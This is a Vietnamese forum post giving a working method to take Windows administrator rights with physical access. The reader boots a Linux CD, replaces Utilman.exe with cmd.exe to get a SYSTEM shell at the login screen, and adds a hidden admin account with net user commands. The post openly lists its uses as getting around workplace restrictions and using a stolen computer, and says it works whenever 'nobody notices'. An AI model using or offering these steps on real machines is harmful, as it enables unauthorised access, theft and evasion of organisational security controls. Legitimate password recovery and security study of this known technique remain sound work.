Xin chia sẻ với anh em một cách đơn giản lấy quyền admin của Window. Sử dụng trong các trường hợp:
1) quên password
2) nơi làm việc không cho quyền admin
3) ăn trộm được con máy tính và không muốn format máy
..
2 + 3 thì không khuyến khích
Nói chung là bất cứ khi nào mó máy được đến máy tính (và không ai để ý) là ta có thể chơi được trò này.
Dĩ nhiên có rất nhiều cách khác, nhưng đây là cách mình cho là đơn giản và nhanh gọn. Anh em nào biết cách hay hơn cũng xin chia sẻ trong topic này.
Thực hiện lần lượt các bước sau:
1) Burn 1 cái CD linux phiên bản bất kỳ
2) Boot bằng CD này, không cần cài, chỉ cần chạy được shell
3) Chạy những command sau lần lượt:
Code:
để ý dòng nào có cái NTFS (FAT32), và copy cái /dev/xxx. ví dụ
Code:
/dev/sda2 13 64408 517250914 7 HPFS/NTFS
mount cái dev này vào folder chơi
Code:
mkdir /mnt/sda2
mount -t ntfs /dev/sda2 /mnt/sda2/
bây giờ đến đoạn tricky, ta sử dụng con "backdoor" cho sẵn của window. http://www.file.net/process/utilman.exe.html)
Code:
cd /mnt/sda2/Windows/System32/
mv Utilman.exe Utilman.exe.bak
cp cmd.exe Utilman.exe
Xong, bây giờ reboot lại vào Window, Nhấn tổ hợp [Window-Key] + U
Bảng cmd.exe chạy dưới quyền SYSTEM sẽ hiện lên. Việc còn lại chỉ là tạo 1 user admin:
Code:
net user foo passf00 /add
net localgroup Administrator foo /add
Sau đó tắt cmd đi vào login vào bằng foo/passf00
Chúc thành công
Tested : Window 7
Nguồn: sưu tầm